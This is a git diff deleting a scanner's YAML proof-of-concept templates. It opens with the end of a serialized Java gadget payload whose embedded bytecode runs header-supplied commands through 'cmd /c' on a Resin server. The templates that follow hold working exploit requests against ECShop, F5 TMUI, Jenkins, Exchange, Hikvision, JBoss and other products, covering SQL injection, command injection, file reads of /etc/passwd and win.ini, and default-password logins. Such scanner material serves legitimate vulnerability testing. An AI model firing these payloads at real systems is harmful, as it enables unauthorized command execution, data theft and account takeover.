<byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBDCABECgBFAEYIADUHAEcKAAgASAcASQoASgBLBwBMCAAuCgAMAE0KAAwATgcATwsAEABQBwBRCgBSAFMHAFQKABQAPwgAVQoAFABWCgAUAFcKAFIAWAoAWQBaCgASAFsIAFwKABIAXQoAEgBeCgBfAGAHAGEKACAAYgcAYwcAZAEABGpha3kBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIkx5YW9zZXJpYWwvcGF5bG9hZHMvdXRpbC9UZXN0T2JqMTsBAAg8Y2xpbml0PgEAA2NtZAEAA3JlcAEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAANvdXQBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAGEBAApTb3VyY2VGaWxlAQANVGVzdE9iajEuamF2YQwAJgAnDAAkACUHAGUMAGYAZwwAaABpAQAsY29tLmNhdWNoby5zZXJ2ZXIuZGlzcGF0Y2guU2VydmxldEludm9jYXRpb24HAGoMAGsAbAEAD2phdmEvbGFuZy9DbGFzcwwAbQBuAQAQamF2YS9sYW5nL09iamVjdAcAbwwAcABxAQAtY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwU2VydmxldFJlcXVlc3RJbXBsDAByAHMMAHQAdQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAB2AHcBABFqYXZhL3V0aWwvU2Nhbm5lcgcAeAwAeQB6AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAdjbWQgL2MgDAB7AHwMAH0AfgwAfwCABwCBDACCAIMMACYAhAEAAlxBDACFAIYMAIcAfgcAiAwAiQCKAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiwAnAQAgeWFvc2VyaWFsL3BheWxvYWRzL3V0aWwvVGVzdE9iajEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEmdldFNlcnZsZXRSZXNwb25zZQEAISgpTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCMCgCNAD8AIQAiAI0AAQAjAAEACgAkACUAAAACAAEAJgAnAAEAKAAAAC8AAQABAAAABSq3AI6xAAAAAgApAAAABgABAAAABwAqAAAADAABAAAABQArACwAAAAIAC0AJwABACgAAAE5AAYABgAAAIMBswACuAADtgAEEgW2AAZLKhIHA70ACLYACUwrAQO9AAq2AAvAAAxNLBINtgAOxgBMLBINtgAOTiy2AA/AABA6BBkEuQARAQA6BRkFuwASWbgAE7sAFFm3ABUSFrYAFy22ABe2ABi2ABm2ABq3ABsSHLYAHbYAHrYAH6cACEsqtgAhsQABAAQAegB9ACAAAwApAAAAPgAPAAAACQAEAA0AEAAOABsADwAoABAAMQARADgAEgBBABMASgAUAHEAFQB3ABQAegAZAH0AFwB+ABgAggAaACoAAABIAAcAOABCAC4AJQADAEEAOQAvADAABABKADAAMQAyAAUAEABqADMANAAAABsAXwA1ADYAAQAoAFIANwA4AAIAfgAEADkAOgAAADsAAAAKAAP7AHpCBwA8BAABAD0AAAACAD4=</byte-array> <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.status == 500 && response.headers["Set-Cookie"].contains("ecology") && response.body.bcontains(b"for 16-bit app support") -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml deleted file mode 100644 index 0b7721c..0000000 --- a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-ecshop-cnvd-2020-58823-sqli -set: - r1: randomInt(40000, 44800) -rules: - - method: POST - path: /delete_cart_goods.php - body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) - expression: | - response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw \ No newline at end of file diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml deleted file mode 100644 index bb9151c..0000000 --- a/WebScan/pocs/ecshop-rce.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ecshop-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /user.php - headers: - Referer: >- - 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/ecshop-rce2.yml b/WebScan/pocs/ecshop-rce2.yml deleted file mode 100644 index c79f02c..0000000 --- a/WebScan/pocs/ecshop-rce2.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ecshop-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /user.php - headers: - Referer: >- - 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/elasticsearch-unauth.yml b/WebScan/pocs/elasticsearch-unauth.yml deleted file mode 100644 index 18b7cd1..0000000 --- a/WebScan/pocs/elasticsearch-unauth.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-elasticsearch-unauth -rules: - - method: GET - path: / - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search") - - method: GET - path: /_cat - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"/_cat/master") -detail: - author: p0wd3r - links: - - https://yq.aliyun.com/articles/616757 diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml deleted file mode 100644 index 97a1da6..0000000 --- a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-exchange-cve-2021-26855-ssrf -rules: - - method: GET - path: /owa/auth/x.js - headers: - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; - follow_redirects: false - expression: | - "X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost") -detail: - author: sharecast - Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010" - links: - - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse \ No newline at end of file diff --git a/WebScan/pocs/eyou-rce.yml b/WebScan/pocs/eyou-rce.yml deleted file mode 100644 index 3e6bfcc..0000000 --- a/WebScan/pocs/eyou-rce.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-eyou-rce -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /webadm/?q=moni_detail.do&action=gragh - headers: - Content-Type: application/x-www-form-urlencoded - body: type='|expr {{r1}} + {{r2}}||' - expression: response.body.bcontains(bytes(string(r1 + r2))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml b/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml deleted file mode 100644 index 100a2ad..0000000 --- a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-f5-tmui-cve-2020-5902-rce -rules: - - method: POST - path: >- - /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp - headers: - Content-Type: application/x-www-form-urlencoded - body: fileName=%2Fetc%2Ff5-release - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(b"BIG-IP release") -detail: - author: Jing Ling - links: - - https://support.f5.com/csp/article/K52145254 - - https://github.com/rapid7/metasploit-framework/pull/13807/files diff --git a/WebScan/pocs/fangweicms-sqli.yml b/WebScan/pocs/fangweicms-sqli.yml deleted file mode 100644 index a9df0f1..0000000 --- a/WebScan/pocs/fangweicms-sqli.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-fangweicms-sqli -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 - expression: | - response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: Rexus - Affected Version: "4.3" - links: - - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ diff --git a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml b/WebScan/pocs/finereport-v8-arbitrary-file-read.yml deleted file mode 100644 index 7cd9f41..0000000 --- a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-finereport-v8-arbitrary-file-read -rules: - - method: GET - path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA") -detail: - author: Facker007(https://github.com/Facker007) - links: - - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8 diff --git a/WebScan/pocs/flir-ax8-file-read.yml b/WebScan/pocs/flir-ax8-file-read.yml deleted file mode 100644 index 6a77cc7..0000000 --- a/WebScan/pocs/flir-ax8-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-flir-ax8-file-read -rules: - - method: GET - path: "/download.php?file=/etc/passwd" - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: Print1n(http://print1n.top) - links: - - https://juejin.cn/post/6961370156484263972 \ No newline at end of file diff --git a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml b/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml deleted file mode 100644 index 8fe94ce..0000000 --- a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-gitlab-cnvd-2021-14193-infoleak -rules: - - method: POST - path: /api/graphql - headers: - Content-Type: application/json - body: >- - {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null} - follow_redirects: false - expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("avatarUrl")) -detail: - author: 说书人(http://python.vin/) - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193 - - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 \ No newline at end of file diff --git a/WebScan/pocs/h3c-secparh-any-user-login.yml b/WebScan/pocs/h3c-secparh-any-user-login.yml deleted file mode 100644 index d9f265f..0000000 --- a/WebScan/pocs/h3c-secparh-any-user-login.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-h3c-secparh-any-user-login -rules: - - method: GET - path: "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" - expression: | - response.status == 200 && ("错误的id".bmatches(response.body) || "审计管理员".bmatches(response.body)) -detail: - author: Print1n(https://print1n.top) - links: - - https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E \ No newline at end of file diff --git a/WebScan/pocs/hikvision-cve-2017-7921.yml b/WebScan/pocs/hikvision-cve-2017-7921.yml deleted file mode 100644 index 78e8440..0000000 --- a/WebScan/pocs/hikvision-cve-2017-7921.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-hikvision-cve-2017-7921 -rules: - - method: GET - path: /system/deviceInfo?auth=YWRtaW46MTEK - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"") && response.headers["content-type"] == "application/xml" -detail: - author: whwlsfb(https://github.com/whwlsfb) - links: - - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html \ No newline at end of file diff --git a/WebScan/pocs/iis6.0-put.yml b/WebScan/pocs/iis6.0-put.yml deleted file mode 100644 index de6c485..0000000 --- a/WebScan/pocs/iis6.0-put.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-iis-put-getshell -set: - filename: randomLowercase(6) - fileContent: randomLowercase(6) - -rules: - - method: PUT - path: /{{filename}}.txt - body: | - {{fileContent}} - expression: | - response.status == 201 - - method: GET - path: /{{filename}}.txt - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(fileContent)) -detail: - author: Cannae(github.com/thunderbarca) - links: - - https://www.cnblogs.com/-mo-/p/11295400.html \ No newline at end of file diff --git a/WebScan/pocs/jboss-cve-2010-1871.yml b/WebScan/pocs/jboss-cve-2010-1871.yml deleted file mode 100644 index c691a25..0000000 --- a/WebScan/pocs/jboss-cve-2010-1871.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-jboss-cve-2010-1871 -set: - r1: randomInt(8000000, 10000000) - r2: randomInt(8000000, 10000000) -rules: - - method: GET - path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d - follow_redirects: false - expression: | - response.status == 302 && response.headers["location"].contains(string(r1 * r2)) -detail: - author: fuping - links: - - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871 \ No newline at end of file diff --git a/WebScan/pocs/jboss-unauth.yml b/WebScan/pocs/jboss-unauth.yml deleted file mode 100644 index 5fbe218..0000000 --- a/WebScan/pocs/jboss-unauth.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-jboss-unauth -rules: - - method: GET - path: /jmx-console/ - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://xz.aliyun.com/t/6103 \ No newline at end of file diff --git a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml b/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml deleted file mode 100644 index 1eb3e2b..0000000 --- a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-jenkins-cve-2018-1000861-rce -set: - rand: randomLowercase(4) -rules: - - method: GET - path: >- - /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload; - follow_redirects: false - expression: >- - response.status == 200 && response.body.bcontains(bytes("package#" + rand)) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 diff --git a/WebScan/pocs/jenkins-unauthorized-access.yml b/WebScan/pocs/jenkins-unauthorized-access.yml deleted file mode 100644 index dabe88b..0000000 --- a/WebScan/pocs/jenkins-unauthorized-access.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-jenkins-unauthorized-access -set: - r1: randomInt(1000, 9999) - r2: randomInt(1000, 9999) -rules: - - method: GET - path: /script - follow_redirects: false - expression: response.status == 200 - search: | - "Jenkins-Crumb", "(?P.+?)"\); - - method: POST - path: /script - body: | - script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C - expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2))) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://www.cnblogs.com/yuzly/p/11255609.html - - https://blog.51cto.com/13770310/2156663 diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml deleted file mode 100644 index 041832d..0000000 --- a/WebScan/pocs/jumpserver-unauth-rce.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-jumpserver-unauth-rce -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /api/v1/authentication/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/authentication/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") -detail: - author: mvhz81 - info: jumpserver unauth read logfile + jumpserver rce - links: - - https://s.tencent.com/research/bsafe/1228.html - - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw - - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml deleted file mode 100644 index 353329d..0000000 --- a/WebScan/pocs/jumpserver-unauth-rce2.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-jumpserver-unauth-rce -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /api/v1/users/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/users/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") -detail: - author: mvhz81 - info: jumpserver unauth read logfile + jumpserver rce - links: - - https://s.tencent.com/research/bsafe/1228.html - - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw - - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/kingsoft-v8-default-password.yml b/WebScan/pocs/kingsoft-v8-default-password.yml deleted file mode 100644 index 6835390..0000000 --- a/WebScan/pocs/kingsoft-v8-default-password.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-kingsoft-v8-default-password -rules: - - method: POST - path: /inter/ajax.php?cmd=get_user_login_cmd - body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}" - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://idc.wanyunshuju.com/aqld/2123.html \ No newline at end of file diff --git a/WebScan/pocs/kingsoft-v8-file-read.yml b/WebScan/pocs/kingsoft-v8-file-read.yml deleted file mode 100644 index 02b3eb0..0000000 --- a/WebScan/pocs/kingsoft-v8-file-read.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-kingsoft-v8-file-read -rules: - - method: GET - path: >- - /htmltopdf/downfile.php?filename=/windows/win.ini - follow_redirects: false - expression: | - response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml deleted file mode 100644 index f7d39e7..0000000 --- a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-landray-oa-custom-jsp-fileread -rules: - - method: POST - path: /sys/ui/extend/varkind/custom.jsp - body: var={"body":{"file":"file:///c://windows/win.ini"}} - expression: | - response.status == 200 && response.body.bcontains(b"for 16-bit app support") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw \ No newline at end of file diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread.yml deleted file mode 100644 index e513a88..0000000 --- a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-landray-oa-custom-jsp-fileread -rules: - - method: POST - path: /sys/ui/extend/varkind/custom.jsp - body: var={"body":{"file":"file:///etc/passwd"}} - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw \ No newline at end of file diff --git a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml deleted file mode 100644 index b4c8a72..0000000 --- a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-lanproxy-cve-2021-3019-lfi -rules: - - method: GET - path: "/../conf/config.properties" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") -detail: - author: pa55w0rd(www.pa55w0rd.online/) - Affected Version: "lanproxy 0.1" - links: - - https://github.com/ffay/lanproxy/issues/152 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 diff --git a/WebScan/pocs/laravel-debug-info-leak.yml b/WebScan/pocs/laravel-debug-info-leak.yml deleted file mode 100644 index aa5610e..0000000 --- a/WebScan/pocs/laravel-debug-info-leak.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-laravel-debug-info-leak -rules: - - method: POST - path: / - follow_redirects: false - expression: > - response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) -detail: - author: Dem0ns (https://github.com/dem0ns) - links: - - https://github.com/dem0ns/improper/tree/master/laravel/5_debug diff --git a/WebScan/pocs/laravel-improper-webdir.yml b/WebScan/pocs/laravel-improper-webdir.yml deleted file mode 100644 index d1db0b5..0000000 --- a/WebScan/pocs/laravel-improper-webdir.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-laravel-improper-webdir -rules: - - 